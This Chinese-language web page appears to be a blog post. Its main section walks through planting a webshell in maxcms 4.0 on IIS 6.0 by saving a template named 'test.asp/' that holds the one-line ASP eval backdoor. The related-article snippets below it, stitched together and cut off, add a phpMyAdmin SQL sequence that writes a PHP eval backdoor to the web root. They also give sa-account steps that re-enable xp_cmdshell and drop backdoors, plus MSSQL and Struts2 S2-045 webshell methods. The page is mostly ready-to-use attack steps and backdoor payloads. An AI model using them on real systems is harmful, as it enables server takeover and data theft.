利用后台模板获取webshell

目标:win2003+iis6.0+maxcms 4.0(无公害,本地搭建测试)

进入后台找到模板页->管理自定义模板,如下图所示:

添加模板,内容如下:
文件名填入:test.asp/

内容填入:<%eval request("test")%>

在模板管理中找到模板的位置,如下图:

使用菜刀连接即可:

时间: 2024-11-03 03:47:32

利用后台模板获取webshell的相关文章

第十五课 php获取webshell漏洞

利用在线升级解压功能获取webshell http://www.176ku.com/anquan/phpcms/201106/14792.html http://www.176ku.com/anquan/phpcms/201101/14285.html 利用自定义模板获取webshell http://www.176ku.com/anquan/phpcms/201104/14653.html http://www.176ku.com/anquan/phpcms/201012/14213.html

在phpmyadmin后台获取webshell方法汇总整理

方法一: CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL ); INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>'); SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php'; ----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xia

PhpMyadmin利用Mysql root密码获取webshell

Simeon Phpmyadmin是一款著名的mysql在线管理系统,通过提供的mysql数据库用户账号和密码对所管理的数据库实施操作.在渗透过程中,一旦获取其mysql账号和对应的密码,轻者获取其账号所管理数据库,重者可以配合其它漏洞获取webshell权限和系统权限.Root账号及口令可以通过暴力破解,源代码泄露等途径获取,本文主要就其root账号获取以及phpmyadmin的利用.如何导出webshell等进行探讨. Mysql root账号及密码在phpmyadmin中的利用思路主要有以

MSSQL DBA权限获取WEBSHELL的过程

前言 本文主要通过一个案例来演示一下当MSSQL是DBA权限,且不知道路径的时候如何去获取WEBSHELL.当然这种方式对站库分离的无效.我测试的环境是在Win7 64位下,数据库是SQLServer 2000,IIS版本是7.5,程序是采用风讯的CMS.后台登录后有多处注入,因为这里是演示用注入获取WEBSHELL,因此就不考虑后台上传的情况了,只是用注入来实现. 过程 首先找到一个如下的注入点: http://192.168.232.138:81/manage/news/Newslist.a

C# 利用WORD模板和标签(bookmark) 批量生成WORD

前言: 由于对C#操作WORD不熟悉,也就留下这么一篇水文,别吐糟...=_=||| 利用Microsoft.Office.Interop.Word (2003版也就11版)——因为部分客户端还是用Office2003,所以保险起见应该引入低一点的版本 我的需求很简单,从DataTable里面循环取数据批量生成Word文档,解决方案是利用Word模板.dot插入书签并保存为程序使用的模板, 用C#打开word模板修改书签的值并批量生成Word. 遇到的问题: 我的思路是打开模板,然后循环修改书签

轻量级ORM 利用T4模板 批量生成多文件 实体和业务逻辑 代码

FluentData,它是一个轻量级框架,关注性能和易用性. 下载地址:FlunenData.Model 利用T4模板,[MultipleOutputHelper.ttinclude]批量生成多文件 基本语法: 1. 初始化:获取MultipleOutputHelper.ttinclude文件模板 在T4模板导入 //导入MultipleOutputHelper.ttinclude文件 路径 <#@include file="$(SolutionDir)\ORM.Model\T4\Mult

sa权限获取webshell思路

1.通过SQL查询分析器通过sa权限首先恢复xp_cmdshell存储过程. 2.通过SQL Tools2.0连接数据库,执行命令,查看网站路径以及磁盘文件,获取网站的真实路径. 3.echo生成一句话后门. 4.直接获取webshell权限. 5.如果echo生成的一句话后门无法执行,可以通过查看对应网站的数据库,获取后台登陆密码,通过后台上传webshell的jpg.然后通过copy命令将jgp文件复制为aspx文件,从而获取webshell. 技巧: 1.寻找可写的文件夹,例如c:/win

利用html模板生成Word文件(服务器端不需要安装Word)

利用html模板生成Word文件(服务器端不需要安装Word) 由于管理的原因,不能在服务器上安装Office相关组件,所以只能采用客户端读取Html模板,后台对模板中标记的字段数据替换并返回给客户端的方法来实现,经过测试这种方法也是一种不错的选择! 首先自己写一个html网页模板,代码如下: <!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>

&#8203;如何快速利用s02-45漏洞获取服务器权限

byantian365.com simeon 1.1CVE-2017-5638漏洞简介 Apache Struts 2是世界上最流行的JavaWeb服务器框架之一.然而在Struts 2上发现存在高危安全漏洞(CVE-2017-5638,S02-45),该漏洞影响到:Struts 2.3.5 - Struts 2.3.31,Struts 2.5 - Struts2.5.10 漏洞编号:CVE-2017-5638 漏洞等级:HIGH 漏洞名称:S2-045:Struts 2远程执行代码漏洞 漏洞影